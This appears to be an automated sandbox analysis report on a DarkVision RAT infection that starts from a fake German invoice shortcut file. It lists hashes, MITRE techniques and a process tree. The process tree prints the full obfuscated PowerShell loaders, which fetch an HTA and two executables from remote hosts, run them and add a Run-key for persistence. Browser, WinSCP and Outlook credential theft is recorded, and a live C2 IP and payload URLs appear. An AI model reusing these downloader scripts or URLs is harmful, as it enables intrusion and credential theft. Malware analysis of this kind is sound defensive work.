darkvision | 781f41c23b460a8b90f0bdb4b2cd0c6642bda3883f45464f016fd9c3b44dbb25

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29-11-2024 16:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Rechnung_2024_0093.pdf.lnk
Size

3KB
MD5

22c803dba48be47631f50a2bc486663d
SHA1

62061211cc2ec3c8d655e0c3217e1e0febb2a4f8
SHA256

7626763bffacecfaaad1880271b0ebc95b3bf961fc21a94e83341641d516adec
SHA512

258635b1c0428a64ad28f0f3d30d24ead81a9e4413a962c49dc5804606931b26046ca048c1e22b4116d1b7f9148e5dcf9c9c6413c06221fce446601da4826709

Score

10^/10

darkvision collection discovery execution persistence rat spyware stealer

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://pub-fee23c54ae4b464fb3904eebeb70c629.r2.dev/upgrade.hta

Extracted

Family

darkvision

5.206.227.213

Signatures

DarkVision Rat
DarkVision Rat is a trojan written in C++.
rat darkvision
Darkvision family
darkvision

Blocklisted process makes network request 4 IoCs

flow	pid	Process
6	3948	mshta.exe
12	3948	mshta.exe
19	4592	powershell.exe
22	4592	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	second.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	KNVYINNN.exe

Executes dropped EXE 8 IoCs

pid	Process
4648	KNVYINNN.exe
1664	pyexec.exe
2932	second.exe
4020	Virtual.exe
2760	pyexec.exe
2776	Virtual.exe
1152	pyexec.exe
2756	pyexec.exe

Loads dropped DLL 18 IoCs

pid	Process
1664	pyexec.exe
4020	Virtual.exe
4020	Virtual.exe
4020	Virtual.exe
4020	Virtual.exe
4020	Virtual.exe
2760	pyexec.exe
2776	Virtual.exe
2776	Virtual.exe
2776	Virtual.exe
2776	Virtual.exe
2776	Virtual.exe
2776	Virtual.exe
2776	Virtual.exe
1152	pyexec.exe
2756	pyexec.exe
1664	BQE_Fast.exe
1884	BQE_Fast.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	BQE_Fast.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hzQtnaa = "C:\\Users\\Admin\\AppData\\Roaming\\KNVYINNN.exe"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4592	powershell.exe
3660	powershell.exe
4592	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2760 set thread context of 2020	2760	pyexec.exe	96
PID 2776 set thread context of 2164	2776	Virtual.exe	114
PID 2756 set thread context of 372	2756	pyexec.exe	120

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pyexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pyexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pyexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pyexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
3660	powershell.exe
3660	powershell.exe
4592	powershell.exe
4592	powershell.exe
1664	pyexec.exe
2760	pyexec.exe
2760	pyexec.exe
4020	Virtual.exe
2020	cmd.exe
2020	cmd.exe
2776	Virtual.exe
2776	Virtual.exe
1152	pyexec.exe
2164	cmd.exe
2164	cmd.exe
2756	pyexec.exe
2756	pyexec.exe
372	cmd.exe
372	cmd.exe
1664	BQE_Fast.exe
1664	BQE_Fast.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
2760	pyexec.exe
2776	Virtual.exe
2020	cmd.exe
2756	pyexec.exe
2164	cmd.exe
372	cmd.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3660	powershell.exe
Token: SeDebugPrivilege	4592	powershell.exe

Suspicious use of WriteProcessMemory 50 IoCs

description	pid	Process	procid_target
PID 4444 wrote to memory of 3660	4444	cmd.exe	84
PID 4444 wrote to memory of 3660	4444	cmd.exe	84
PID 3660 wrote to memory of 3948	3660	powershell.exe	85
PID 3660 wrote to memory of 3948	3660	powershell.exe	85
PID 3948 wrote to memory of 4592	3948	mshta.exe	86
PID 3948 wrote to memory of 4592	3948	mshta.exe	86
PID 4592 wrote to memory of 4648	4592	powershell.exe	89
PID 4592 wrote to memory of 4648	4592	powershell.exe	89
PID 4648 wrote to memory of 1664	4648	KNVYINNN.exe	90
PID 4648 wrote to memory of 1664	4648	KNVYINNN.exe	90
PID 4648 wrote to memory of 1664	4648	KNVYINNN.exe	90
PID 4592 wrote to memory of 2932	4592	powershell.exe	93
PID 4592 wrote to memory of 2932	4592	powershell.exe	93
PID 2932 wrote to memory of 4020	2932	second.exe	94
PID 2932 wrote to memory of 4020	2932	second.exe	94
PID 1664 wrote to memory of 2760	1664	pyexec.exe	95
PID 1664 wrote to memory of 2760	1664	pyexec.exe	95
PID 1664 wrote to memory of 2760	1664	pyexec.exe	95
PID 2760 wrote to memory of 2020	2760	pyexec.exe	96
PID 2760 wrote to memory of 2020	2760	pyexec.exe	96
PID 2760 wrote to memory of 2020	2760	pyexec.exe	96
PID 2760 wrote to memory of 2020	2760	pyexec.exe	96
PID 4020 wrote to memory of 2776	4020	Virtual.exe	105
PID 4020 wrote to memory of 2776	4020	Virtual.exe	105
PID 2776 wrote to memory of 2164	2776	Virtual.exe	114
PID 2776 wrote to memory of 2164	2776	Virtual.exe	114
PID 2776 wrote to memory of 2164	2776	Virtual.exe	114
PID 4648 wrote to memory of 1152	4648	KNVYINNN.exe	117
PID 4648 wrote to memory of 1152	4648	KNVYINNN.exe	117
PID 4648 wrote to memory of 1152	4648	KNVYINNN.exe	117
PID 2776 wrote to memory of 2164	2776	Virtual.exe	114
PID 1152 wrote to memory of 2756	1152	pyexec.exe	118
PID 1152 wrote to memory of 2756	1152	pyexec.exe	118
PID 1152 wrote to memory of 2756	1152	pyexec.exe	118
PID 2020 wrote to memory of 1664	2020	cmd.exe	119
PID 2020 wrote to memory of 1664	2020	cmd.exe	119
PID 2756 wrote to memory of 372	2756	pyexec.exe	120
PID 2756 wrote to memory of 372	2756	pyexec.exe	120
PID 2756 wrote to memory of 372	2756	pyexec.exe	120
PID 2020 wrote to memory of 1664	2020	cmd.exe	119
PID 2020 wrote to memory of 1664	2020	cmd.exe	119
PID 2756 wrote to memory of 372	2756	pyexec.exe	120
PID 2164 wrote to memory of 3352	2164	cmd.exe	122
PID 2164 wrote to memory of 3352	2164	cmd.exe	122
PID 2164 wrote to memory of 3352	2164	cmd.exe	122
PID 2164 wrote to memory of 3352	2164	cmd.exe	122
PID 372 wrote to memory of 1884	372	cmd.exe	123
PID 372 wrote to memory of 1884	372	cmd.exe	123
PID 372 wrote to memory of 1884	372	cmd.exe	123
PID 372 wrote to memory of 1884	372	cmd.exe	123

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	BQE_Fast.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0093.pdf.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $W='b/hLra647502c-dA3gf.uv9e:sptM'; &(-join($W[(-251+276),(-817+822),(-322+325)])) ~* (-join($W[(-251+276),(-817+822),(-322+325)])); ~* =# (-join($W[(-91+119),(-251+276),(716-714),(781-754),(-817+822)])); foreach($U in @((-539+541),(-684+711),(-330+357),(-781+807),(278-253),(678-654),(-677+678),(-293+294),(798-772),(-104+124),(557-557),(-984+997),(912-894),(199-176),(-640+663),(-585+596),(336-320),(-872+884),(208-199),(-754+761),(535-530),(803-780),(-277+284),(-543+543),(185-178),(-460+466),(-965+972),(764-746),(-246+246),(-517+533),(-405+427),(-234+244),(-900+907),(417-394),(-84+107),(-470+470),(-739+762),(-323+323),(788-780),(469-459),(436-424),(-858+864),(858-847),(450-428),(-309+328),(107-103),(744-733),(-529+548),(-382+396),(-437+460),(439-418),(-358+359),(-556+576),(-175+201),(-763+780),(-704+708),(141-136),(912-898),(-592+615),(-757+776),(128-126),(261-234),(890-885))){$O+=$W[$U]}; =# $O;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3660
- - C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" https://pub-fee23c54ae4b464fb3904eebeb70c629.r2.dev/upgrade.hta
    3⤵
    - Blocklisted process makes network request
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function gCKawp($xqETuHkBN, $cgpVK){[IO.File]::WriteAllBytes($xqETuHkBN, $cgpVK)};function TPUUAPTRh($xqETuHkBN){if($xqETuHkBN.EndsWith((odPEDz @(47359,47413,47421,47421))) -eq $True){Start-Process (odPEDz @(47427,47430,47423,47413,47421,47421,47364,47363,47359,47414,47433,47414)) $xqETuHkBN}else{Start-Process $xqETuHkBN}};function IogZmN($xqETuHkBN, $fYoQizCPx){[Microsoft.Win32.Registry]::SetValue((odPEDz @(47385,47388,47382,47402,47408,47380,47398,47395,47395,47382,47391,47397,47408,47398,47396,47382,47395,47405,47396,47424,47415,47429,47432,47410,47427,47414,47405,47390,47418,47412,47427,47424,47428,47424,47415,47429,47405,47400,47418,47423,47413,47424,47432,47428,47405,47380,47430,47427,47427,47414,47423,47429,47399,47414,47427,47428,47418,47424,47423,47405,47395,47430,47423)), $fYoQizCPx, $xqETuHkBN)};function MCNjOTFH($xqETuHkBN){$IVMCWJwi=(odPEDz @(47385,47418,47413,47413,47414,47423));$VGLgiVJ=(Get-ChildItem $xqETuHkBN -Force);$VGLgiVJ.Attributes=$VGLgiVJ.Attributes -bor ([IO.FileAttributes]$IVMCWJwi).value__};function oBvvmAnE($iXTtDfK){$GzBKYX = New-Object (odPEDz @(47391,47414,47429,47359,47400,47414,47411,47380,47421,47418,47414,47423,47429));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cgpVK = $GzBKYX.DownloadData($iXTtDfK);return $cgpVK};function odPEDz($rGehVsA){$jtBdpZ=47313;$YWQUeqd=$Null;foreach($qyPsd in $rGehVsA){$YWQUeqd+=[char]($qyPsd-$jtBdpZ)};return $YWQUeqd};function WmSEp(){$lEPJgGls = $env:APPDATA + '\';$SCATfjY = oBvvmAnE (odPEDz @(47417,47429,47429,47425,47428,47371,47360,47360,47425,47430,47411,47358,47414,47362,47415,47412,47413,47410,47413,47369,47363,47368,47367,47413,47365,47368,47413,47415,47410,47413,47364,47415,47369,47363,47415,47366,47370,47364,47367,47411,47370,47412,47366,47364,47359,47427,47363,47359,47413,47414,47431,47360,47388,47391,47399,47402,47386,47391,47391,47391,47359,47414,47433,47414));$VQrLt = $lEPJgGls + 'KNVYINNN.exe';gCKawp $VQrLt $SCATfjY;TPUUAPTRh $VQrLt;$fYoQizCPx = 'hzQtnaa';IogZmN $VQrLt $fYoQizCPx;;$MfdAL = oBvvmAnE (odPEDz @(47417,47429,47429,47425,47428,47371,47360,47360,47425,47430,47411,47358,47412,47366,47410,47362,47369,47414,47411,47368,47367,47414,47361,47364,47365,47413,47369,47369,47369,47370,47370,47414,47362,47415,47365,47365,47415,47369,47366,47370,47410,47369,47365,47370,47359,47427,47363,47359,47413,47414,47431,47360,47428,47414,47412,47424,47423,47413,47359,47414,47433,47414));$NtudOlR = $lEPJgGls + 'second.exe';gCKawp $NtudOlR $MfdAL;TPUUAPTRh $NtudOlR;MCNjOTFH $NtudOlR;;;}WmSEp;
      4⤵
      Blocklisted process makes network request
      Adds Run key to start application
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4592
    - - C:\Users\Admin\AppData\Roaming\KNVYINNN.exe
        
        "C:\Users\Admin\AppData\Roaming\KNVYINNN.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4648
      - C:\Users\Admin\pyexec.exe
        
        "C:\Users\Admin\pyexec.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1664
        
        C:\Users\Admin\AppData\Roaming\AltDaemon\pyexec.exe
        
        C:\Users\Admin\AppData\Roaming\AltDaemon\pyexec.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:2760
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:2020
        
        C:\Users\Admin\AppData\Local\Temp\BQE_Fast.exe
        
        C:\Users\Admin\AppData\Local\Temp\BQE_Fast.exe
        9⤵
        Loads dropped DLL
        Accesses Microsoft Outlook profiles
        Suspicious behavior: EnumeratesProcesses
        outlook_office_path
        
        PID:1664
      - C:\Users\Admin\pyexec.exe
        
        "C:\Users\Admin\pyexec.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1152
        
        C:\Users\Admin\AppData\Roaming\AltDaemon\pyexec.exe
        
        C:\Users\Admin\AppData\Roaming\AltDaemon\pyexec.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:2756
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:372
        
        C:\Users\Admin\AppData\Local\Temp\BQE_Fast.exe
        
        C:\Users\Admin\AppData\Local\Temp\BQE_Fast.exe
        9⤵
        Loads dropped DLL
        
        PID:1884
    - - C:\Users\Admin\AppData\Roaming\second.exe
        
        "C:\Users\Admin\AppData\Roaming\second.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2932
      - C:\Users\Admin\Virtual.exe
        
        "C:\Users\Admin\Virtual.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4020
        
        C:\Users\Admin\AppData\Roaming\RemoteSvc\Virtual.exe
        
        C:\Users\Admin\AppData\Roaming\RemoteSvc\Virtual.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:2776
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:2164
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe
        9⤵
        
        PID:3352

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4aa190916ef25979ed4d07e0371416c5

SHA1
f03c994ef694dfe3fe3b0c93377c016431c2a64d

SHA256
6cea2de2bced825142de30b4ccedfc2d36e17a2b53721a50fcfe36de9fa715b1

SHA512
00cabcaf24bc86e72fae51fc7a32df0e245842959751035f22ba18d6baba93a42225a99786513c46d78182fddc1c3351cd746dda1c7cee4fb30ed35fe4300229

Download Submit
C:\Users\Admin\AppData\Local\Temp\2ce54f6b

Filesize
5.5MB

MD5
259d7f977c6ed017d782052740e2e5ed

SHA1
06b440d25e5c745a1efd12b69b6267eee0f0c0bb

SHA256
035e83b212cf8dc54f0cfe3574e47a516307c10e5b345f7ea1ef90db1cc96ab5

SHA512
721f657c411b6a6d2834c61c7fa325ce72b07e63196cba313bc426d69e1ad635a47a2daf02065fac308d97e7d9d930f7b5dceb7c1820370233320ae811173a04

Download Submit
C:\Users\Admin\AppData\Local\Temp\960ca03c

Filesize
1.1MB

MD5
9a68c006cf1fe38fda15452e74e2b9e4

SHA1
548bbb5c7a51e0cf7e5aba94b12e122f9bdd8a84

SHA256
694f368af07482425afc4a0b8bb991815b0d6db645e2e2c9fb8d2edae614735e

SHA512
151a5c83804227193d96922cc9c3a19eb28db12794be7033e14ed989bc39981eeb7ffac6941fb0747c0019e4d9bb0c340d31e83703ade52ee7f93213d91718f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\BQE_Fast.exe

Filesize
2.3MB

MD5
967f4470627f823f4d7981e511c9824f

SHA1
416501b096df80ddc49f4144c3832cf2cadb9cb2

SHA256
b22bf1210b5fd173a210ebfa9092390aa0513c41e1914cbe161eb547f049ef91

SHA512
8883ead428c9d4b415046de9f8398aa1f65ae81fe7945a840c822620e18f6f9930cce2e10acff3b5da8b9c817ade3dabc1de576cbd255087267f77341900a41c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jc2fv4sj.kyc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\d0c20bdc

Filesize
5.5MB

MD5
99d57142497ab34947465d90a7263181

SHA1
6a15c811610413da13fbafb871f8e8d224f3c996

SHA256
5fa4b181097db72f73cd076ca8588ef227c9eeaafe420095ee75b6ff366f4d9a

SHA512
583c8195267f2f141308c97de65a46360bd87d378abf362fc4829f1e91c048003cc1c36d1a72df5b4a0f50c3a4d20df90e8866781262ed1fd0fc3abaf12253b0

Download Submit
C:\Users\Admin\AppData\Roaming\KNVYINNN.exe

Filesize
6.1MB

MD5
e06afcdb16d22bd45bc3a5b01c96da3a

SHA1
a0f776c4c64a808676082449f23858257f1aa132

SHA256
5665bb7e9557ec139e0a60fd43b8775fb9bb764db581e7e2278c83b1f2c3c358

SHA512
13beb7a8aa1aae7f182cdc0215d56feac1f04532dce6d1fddc358d422e571616f2fcea569bf6f1a8dcdc5733780938b4f82681e24290338852e6e37102741e33

Download Submit
C:\Users\Admin\AppData\Roaming\second.exe

Filesize
4.0MB

MD5
47cb10ebf122aea1d817c5b57737c2fc

SHA1
074b2f5ab20d09dcf7c0c8701568fc3654a47303

SHA256
54be46f3daaad32f18eb85dae280b3ca6f81c640dd9531ed16b71817a3a2973c

SHA512
c8237bfb26a625eaeafe36dc0277626735da1f2dbf33208374a28ce08c52b97cb2c087b85bd227d6cc7b7541743c28d674415031ee600853056af393ead26ecb

Download Submit
C:\Users\Admin\PYTHON27.DLL

Filesize
2.5MB

MD5
22ac09892f3706c6660d1ffe3387c07a

SHA1
06e0f1ea9958b338598d0b1378918e4efca773b8

SHA256
2e158dfbcf37e16d4b0d73d59f5d583a733a12c7cfed243a76b2de2fc9defbf7

SHA512
4e40e904e680fd861bbb782c4b790c3b290e612e8fc196ab520b1ab7de53e696df316d45968f744ddf218ce04ca06ae2ae1cbf8b6b8cab9c04c980ca32befeb0

Download Submit
C:\Users\Admin\VBoxDDU.dll

Filesize
371KB

MD5
496df6ad1a158ed5037138e397713ef0

SHA1
287bd2219c955687baa399ded57e9ab64334c63c

SHA256
07c04290f53aaaaa7df6b6ea3a53103b6e3ef8ff658d8097617a9c48dfc6e90a

SHA512
422da26a8f50c1f02c1cc7c4bed37cdb33732039bba82f32c2a14baa8c6a7bc5544856ab26a2071b5ea8e731a296e2c69071da2f067312d05763aa3a9928bb3a

Download Submit
C:\Users\Admin\VBoxRT.dll

Filesize
4.0MB

MD5
1ed9d695fd31239e2b16e3712f96965f

SHA1
acb9c07dedc5cd9fe5632ab92f77f0bd046d2bb2

SHA256
414c538d3884da4a5737f0fab8834333dc520e50c230d9e08cc40832806a0730

SHA512
2e3d8326b8e38b4d2babf6c69fe552f3f58c8672fac269ecdd1f9a90fde3b0917971bcb79b0fa46d4353dadd93a482b60d8f02b3065fe907b5a6067202a5333c

Download Submit
C:\Users\Admin\Virtual.exe

Filesize
3.4MB

MD5
c8a2de7077f97d4bce1a44317b49ef41

SHA1
6cb3212ec9be08cb5a29bf8d37e9ca845efc18c9

SHA256
448402c129a721812fa1c5f279f5ca906b9c8bbca652a91655d144d20ce5e6b4

SHA512
9815eba1566a8e33734f6a218071ec501dd1f799b1535e25d87c2b416b928ae8d15f8218cf20e685f9907ec39c202cbfc4728fe6ab9d87b3de345109f626845e

Download Submit
C:\Users\Admin\hvotj

Filesize
4.4MB

MD5
e70ee3bca802db0197b2632b0f2ab4db

SHA1
aa7e9665baaa4a2c487dd5d1059b2cb2cdcae8e3

SHA256
0cbf2430f07b5bdef2633605e0a65ed68ac1b3dbf3ae5bb8b79695f40a48aefd

SHA512
e93c763eff21a05c8d283a07ea9a6a357fa92394f2da35e75f3796e8ca94f9f220811ead59b5d562a7f20a6e2caa459a20dc8076a749d81628253dcba1fe1709

Download Submit
C:\Users\Admin\ikfusab

Filesize
783KB

MD5
72381196433e3385bb4be8ff422800ef

SHA1
d81bc8d8036ef92e7f24228618350e77827f314d

SHA256
bf7db4b113588c19dc13603024ecf3d90bb8eb3854ad00fad883a74e001a341a

SHA512
38d2c4821c147d47381c15aacb76b577aee9fab81329b71be0b965ce31ab76b26cbb683d919b033aa79594aabc0401ce5d336de537724cfadc9ccbbfbfc5a678

Download Submit
C:\Users\Admin\ikvseqx

Filesize
22KB

MD5
9078f84220e8b7379bfa2f4333995bc1

SHA1
21f0cbeffdcd99bce6521aadead7aa6f68edd666

SHA256
b7c4fec4464e43a5736bf764f137f9aee03c7e0d67755d964ab74854bc725f8f

SHA512
45dd6188e3085d34e632091068f9d7c31d22e2643a20fb1a01c1c255f593e71fa2aeb34fd85d22dfacfbbdf7a1d69750206745215ee77d01a759ada9849be090

Download Submit
C:\Users\Admin\msvcp100.dll

Filesize
593KB

MD5
d029339c0f59cf662094eddf8c42b2b5

SHA1
a0b6de44255ce7bfade9a5b559dd04f2972bfdc8

SHA256
934d882efd3c0f3f1efbc238ef87708f3879f5bb456d30af62f3368d58b6aa4c

SHA512
021d9af52e68cb7a3b0042d9ed6c9418552ee16df966f9ccedd458567c47d70471cb8851a69d3982d64571369664faeeae3be90e2e88a909005b9cdb73679c82

Download Submit
C:\Users\Admin\msvcr100.dll

Filesize
809KB

MD5
366fd6f3a451351b5df2d7c4ecf4c73a

SHA1
50db750522b9630757f91b53df377fd4ed4e2d66

SHA256
ae3cb6c6afba9a4aa5c85f66023c35338ca579b30326dd02918f9d55259503d5

SHA512
2de764772b68a85204b7435c87e9409d753c2196cf5b2f46e7796c99a33943e167f62a92e8753eaa184cd81fb14361e83228eb1b474e0c3349ed387ec93e6130

Download Submit
C:\Users\Admin\msvcr90.dll

Filesize
638KB

MD5
11d49148a302de4104ded6a92b78b0ed

SHA1
fd58a091b39ed52611ade20a782ef58ac33012af

SHA256
ceb0947d898bc2a55a50f092f5ed3f7be64ac1cd4661022eefd3edd4029213b0

SHA512
fdc43b3ee38f7beb2375c953a29db8bcf66b73b78ccc04b147e26108f3b650c0a431b276853bb8e08167d34a8cc9c6b7918daef9ebc0a4833b1534c5afac75e4

Download Submit
C:\Users\Admin\pyexec.exe

Filesize
28KB

MD5
b6f6c3c38568ee26f1ac70411a822405

SHA1
5b94d0adac4df2d7179c378750c4e3417231125f

SHA256
a73454c7fad23a80a3f6540afdb64fc334980a11402569f1986aa39995ae496d

SHA512
5c0a5e9a623a942aff9d58d6e7a23b7d2bba6a4155824aa8bb94dbd069a8c15c00df48f12224622efcd5042b6847c8fb476c43390e9e576c42efc22e3c02a122

Download Submit
C:\Users\Admin\sgx

Filesize
17KB

MD5
d00b94674f06f45b8315ccf49d3a383b

SHA1
465cccf79a1b7ab9d973db70c3a253e4a066aa6b

SHA256
fc2ebd32f984ec563113d6759db21d1ff4394da6bc0c688c9165d1d2e60fadcd

SHA512
63768752a2406baf517f675b6130798d55f16731152491f4c99c0d39aab394eb96a67410875bc947685125bce611fc50b021b9a2935d491be62b3f75e9bb70f6

Download Submit
memory/372-247-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/1152-216-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/1152-215-0x0000000075280000-0x00000000753FB000-memory.dmp

Filesize
1.5MB

Download
memory/1664-244-0x00007FF6D3570000-0x00007FF6D386D000-memory.dmp

Filesize
3.0MB

Download
memory/1664-135-0x00007FFCF7810000-0x00007FFCF7A05000-memory.dmp

Filesize
2.0MB

Download
memory/1664-270-0x00007FF6D3570000-0x00007FF6D386D000-memory.dmp

Filesize
